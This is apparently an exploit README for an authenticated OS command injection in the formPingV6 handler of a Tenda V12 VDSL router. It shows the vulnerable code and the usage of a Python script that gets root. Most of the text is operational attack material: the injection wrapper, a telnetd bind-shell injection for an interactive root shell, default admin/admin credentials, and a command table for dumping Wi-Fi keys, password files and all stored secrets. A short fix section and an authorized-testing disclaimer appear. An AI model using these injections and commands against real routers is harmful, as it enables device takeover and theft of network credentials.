Share
## https://sploitus.com/exploit?id=A31A9580-9453-5320-90AB-5E42F73610EC
# Tenda V12 (AC1200 VDSL) V56.1.1.11 โ€” `formPingV6` Command Injection

Single, focused PoC for the **`formPingV6` authenticated OS command injection**.
No dependencies (Python 3 stdlib). **Authorized testing only.**

## The bug

`POST /boaform/formPingV6`, parameter **`pingV6Addr`**, flows unvalidated into a shell:

```c
snprintf(buf, 0x200, "ping6 -c 4 %s > /tmp/ping6.tmp 2>&1", pingV6Addr);
va_cmd("/bin/sh", "-c", buf);        // /bin/sh -c "ping6 -c 4  ..."
```

The only check on `pingV6Addr` is non-empty, so shell metacharacters inject.
`boa` runs as **root** โ†’ commands execute as **root**. Auth: post-login, default
`admin/admin`, source-IP session.

## Usage

```bash
# interactive root shell (starts telnetd + auto-connects; HTTP-shell fallback)
python3 formpingv6_rce.py -t 192.168.1.1

# run a single command (output is captured and returned)
python3 formpingv6_rce.py -t 192.168.1.1 -c "cat /proc/self/status"
python3 formpingv6_rce.py -t 192.168.1.1 -c "cat /var/passwd"
python3 formpingv6_rce.py -t 192.168.1.1 -c "flash get WLAN_WPA_PSK"
```

| Flag | Meaning |
|------|---------|
| `-t` / `-p` / `--tls` | target / web port (80) / HTTPS |
| `-u` / `-P` | credentials (default `admin` / `admin`) |
| `-c, --cmd` | run one command (else drop into an interactive shell) |
| `--shell-port` | telnetd port for the interactive shell (default 9999) |
| `--no-login` | skip the login step |

## Device command notes (busybox / Realtek)

| Want | Use |
|------|-----|
| prove root | `cat /proc/self/status \| grep -i uid`  โ†’ `Uid: 0` = root |
| kernel/arch | `busybox uname -a` (`uname` alone is missing) |
| Wi-Fi password | `flash get WLAN_WPA_PSK` / `flash get WLAN1_WPA_PSK` (plaintext) |
| credentials | `cat /var/passwd` , `cat /etc/ftpdpassword` |
| all secrets | `flash dump cs \| grep -i psk` |
| processes/net | `busybox ps` , `busybox ifconfig` , `busybox netstat -lntup` |

> `id` is shadowed by `/etc/scripts/id` (a Wi-Fi register script) โ€” don't use it.
> For missing commands, prefix with `busybox` or use absolute paths (`/bin/cat`).

## How it works
1. Logs in (`admin/admin`, IP-based session).
2. For `-c CMD`: wraps it as `; { CMD ; } > /tmp/ping6.tmp 2>&1 #` so its output lands
   in the file `formPingV6` echoes back, and parses the `` lines out of the response.
3. Interactive mode: injects `telnetd -l /bin/sh -p 9999`, connects, and relays a raw
   root shell (falls back to an HTTP-tunneled shell if the port is filtered).

## Fix
Validate `pingV6Addr` as an IPv6 address (`inet_pton(AF_INET6, โ€ฆ)`), and use
`execv("/bin/ping6", argv)` with separate arguments instead of `/bin/sh -c`.

## Files
| File | Purpose |
|------|---------|
| `formpingv6_rce.py` | the exploit (interactive shell / one-shot command) |
| `README.md` | this document |
| `CVE_REQUEST.md` | ready-to-fill text for a MITRE CVE ID request |

> Authorized testing only. Use exclusively on devices you own or are permitted to assess.